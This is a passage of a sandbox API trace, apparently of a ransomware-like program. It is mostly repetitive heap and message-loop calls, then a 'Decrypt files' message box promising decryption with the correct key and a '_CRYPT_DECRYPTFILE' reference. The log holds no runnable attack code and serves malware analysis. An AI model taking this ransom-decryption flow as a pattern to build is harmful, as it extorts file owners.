Size=0x4) returned 0xf33b98 [0273.926] Sleep (dwMilliseconds=0x0) [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.926] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.926] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.926] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.926] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.927] Sleep (dwMilliseconds=0x0) [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.927] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.927] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.927] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.927] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.927] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.927] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.928] Sleep (dwMilliseconds=0x0) [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.928] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.928] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.928] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.928] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.928] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.928] Sleep (dwMilliseconds=0x0) [0273.928] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.929] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.929] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.929] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.929] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.929] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.929] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.929] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.929] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.929] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.929] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.930] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.930] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.930] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.930] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.930] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.930] Sleep (dwMilliseconds=0x0) [0273.930] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.930] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.930] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.930] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.930] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.930] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.930] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.930] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0274.048] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8df1a0) returned 1 [0274.049] MessageBoxW (hWnd=0x0, lpText="Your files will be decrypted if the decryption key was correct", lpCaption="Decrypt files", uType=0x10040) returned 1 [0274.107] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.107] NtdllDialogWndProc_W () returned 0x1 [0274.108] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.109] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.109] NtdllDialogWndProc_W () returned 0x0 [0274.112] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.112] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.112] NtdllDialogWndProc_W () returned 0x0 [0274.117] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.117] NtdllDialogWndProc_W () returned 0x1 [0274.117] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.117] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.117] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.118] SetBkColor (hdc=0x650106f8, color=0xf0f0f0) returned 0xffffff [0274.118] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.118] NtdllDialogWndProc_W () returned 0x0 [0274.118] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.118] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.118] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.118] SetBkColor (hdc=0x650106f8, color=0xf0f0f0) returned 0xf0f0f0 [0274.118] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.118] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.118] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.118] NtdllDialogWndProc_W () returned 0x0 [0274.119] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.119] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.119] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.119] NtdllDialogWndProc_W () returned 0x0 [0274.119] GetForegroundWindow () returned 0xa0150 [0274.119] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.137] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.137] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.137] NtdllDialogWndProc_W () returned 0x0 [0274.138] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.138] NtdllDialogWndProc_W () returned 0x1 [0274.138] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.138] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.138] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.138] SetBkColor (hdc=0x3b01071a, color=0xf0f0f0) returned 0xffffff [0274.138] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.138] NtdllDialogWndProc_W () returned 0x0 [0274.138] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.138] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.138] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.138] SetBkColor (hdc=0x3b01071a, color=0xf0f0f0) returned 0xf0f0f0 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.139] NtdllDialogWndProc_W () returned 0x0 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.139] NtdllDialogWndProc_W () returned 0x0 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] NtdllDialogWndProc_W () returned 0x1 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.139] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xffffff [0274.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.139] NtdllDialogWndProc_W () returned 0x0 [0274.140] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.140] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.140] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.140] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0274.140] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.140] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.140] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.140] NtdllDialogWndProc_W () returned 0x0 [0274.140] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.140] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.140] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.140] NtdllDialogWndProc_W () returned 0x0 [0274.140] GetForegroundWindow () returned 0xa0150 [0274.141] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.182] GetForegroundWindow () returned 0xa0150 [0274.182] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.227] GetForegroundWindow () returned 0xa0150 [0274.227] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.278] GetForegroundWindow () returned 0xa0150 [0274.278] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.331] GetForegroundWindow () returned 0xa0150 [0274.331] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.368] GetForegroundWindow () returned 0x0 [0274.419] GetForegroundWindow () returned 0xa0150 [0274.419] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.459] GetForegroundWindow () returned 0xa0150 [0274.459] GetWindowLongW (hWnd=0xa0150, nIndex=-21) returned 9304344 [0274.521] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.521] NtdllDialogWndProc_W () returned 0x0 [0274.523] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.523] NtdllDialogWndProc_W () returned 0x1 [0274.523] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.523] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.523] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.523] SetBkColor (hdc=0xc80101b7, color=0xf0f0f0) returned 0xf0f0f0 [0274.526] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.526] NtdllDialogWndProc_W () returned 0x0 [0274.527] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.527] NtdllDialogWndProc_W () returned 0x0 [0274.529] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.529] NtdllDialogWndProc_W () returned 0x1 [0274.529] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.529] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.529] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.529] SetBkColor (hdc=0xc80101b7, color=0xf0f0f0) returned 0xf0f0f0 [0274.529] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.529] NtdllDialogWndProc_W () returned 0x0 [0274.530] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.530] NtdllDialogWndProc_W () returned 0x0 [0274.530] NtdllDefWindowProc_W () returned 0x0 [0274.530] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.530] NtdllDialogWndProc_W () returned 0x1 [0274.531] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.531] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.531] NtdllDialogWndProc_W () returned 0x0 [0274.534] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0274.534] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0274.534] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9610 | out: hHeap=0xcc0000) returned 1 [0274.534] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed95b0 | out: hHeap=0xcc0000) returned 1 [0274.534] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb740 | out: hHeap=0xcc0000) returned 1 [0274.534] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1ff28 | out: hHeap=0xcc0000) returned 1 [0274.534] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.534] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.534] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0274.547] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0274.547] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.547] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.547] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0274.547] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0274.547] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.547] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.547] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.547] NtdllDialogWndProc_W () returned 0x0 [0274.548] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.548] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0274.548] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.548] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.548] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0274.548] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.548] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.548] BeginPaint (in: hWnd=0xc0170, lpPaint=0x8df7f8 | out: lpPaint=0x8df7f8) returned 0xc80101b7 [0274.548] EndPaint (hWnd=0xc0170, lpPaint=0x8df7f8) returned 1 [0274.548] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.548] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.548] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0274.549] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.549] NtdllDialogWndProc_W () returned 0x1 [0274.549] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.549] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.549] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.549] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0274.549] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.549] NtdllDialogWndProc_W () returned 0x0 [0274.549] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.549] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.549] GetSysColor (nIndex=15) returned 0xf0f0f0 [0274.549] SetBkColor (hdc=0x670106f8, color=0xf0f0f0) returned 0xf0f0f0 [0274.550] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.550] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.550] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.550] NtdllDialogWndProc_W () returned 0x0 [0274.550] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.550] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.550] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0274.550] NtdllDialogWndProc_W () returned 0x0 [0274.550] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.550] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.550] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0274.551] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.551] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.551] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0274.551] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0274.551] GetForegroundWindow () returned 0xc0170 [0274.551] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.551] GetCursorPos (in: lpPoint=0x8df940 | out: lpPoint=0x8df940*(x=881, y=501)) returned 1 [0274.551] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df940 | out: lpPoint=0x8df940) returned 1 [0274.551] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x24) returned 0xeebb00 [0274.551] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb740 [0274.551] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33bc8 [0274.551] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33aa8 [0274.551] GetAsyncKeyState (vKey=1) returned 1 [0274.551] GetAsyncKeyState (vKey=2) returned 0 [0274.552] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ad8 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e48 [0274.552] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0274.552] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0274.552] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1ff28 [0274.552] RtlAllocateHeap 